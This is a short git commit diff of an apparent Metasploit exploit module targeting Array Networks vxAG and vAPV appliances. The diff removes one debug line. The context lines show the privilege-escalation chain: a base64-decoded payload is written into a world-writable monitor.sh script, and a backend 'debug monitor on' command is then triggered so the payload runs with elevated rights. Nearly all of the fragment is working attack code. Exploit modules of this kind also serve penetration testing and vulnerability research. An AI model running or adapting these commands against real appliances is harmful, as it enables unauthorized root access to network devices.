Array Networks vxAG and vAPV SSH key and privesc
parent
1043d9d8b2
commit
e261975c34
|
@ -177,8 +177,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};"
|
command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};"
|
||||||
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
|
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
|
||||||
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
|
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
|
||||||
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /tmp/blaat.sh;"
|
|
||||||
|
|
||||||
# Turn debug monitoring on, which will start the monitor.sh and thus our payload
|
# Turn debug monitoring on, which will start the monitor.sh and thus our payload
|
||||||
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
|
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
|
||||||
# Copy monitor.sh data back
|
# Copy monitor.sh data back
|
||||||
|
|